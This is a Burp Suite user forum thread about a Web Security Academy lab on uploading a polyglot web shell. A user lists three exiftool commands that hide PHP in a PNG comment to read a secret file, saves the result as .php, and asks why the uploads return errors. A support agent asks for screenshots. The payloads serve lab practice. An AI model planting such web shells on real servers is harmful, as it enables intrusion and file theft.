Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Remote code execution via polyglot web shell upload giving 500 response

Kaustubh | Last updated: Apr 09, 2024 07:25AM UTC

tried uploading various .php files in the lab, they all get uploaded, but when we go back to /my-account. the request for GET /files/avatars/virusimage.php or whatever the name of the .php file is. it gives 500 error. added a php command as a comment in the metadata in a .png using. 1] exiftool -Comment="<?php echo 'FLAG to the RIGHT' . file_get_contents('/home/carlos/secret') . 'Flag to the LEFT' ; ?>" avatar.png -o virusimage.php 2] exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" avatar.png -o polyglot.php 3] exiftool -Comment="<?php echo file_get_contents('/home/carlos/secret'); ?>" avatar.png -o polyglot.php all the files got uploaded but the request to the file gives 500 Internal Server Error.

Ben, PortSwigger Agent | Last updated: Apr 09, 2024 12:19PM UTC

Hi Kaustubh, Are you able to email us at support@portswigger.net and include some screenshots of exactly what you are doing and what you are seeing? Having just run through this lab it does appear to be working as expected and I was able to solve it using the written solution provided.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.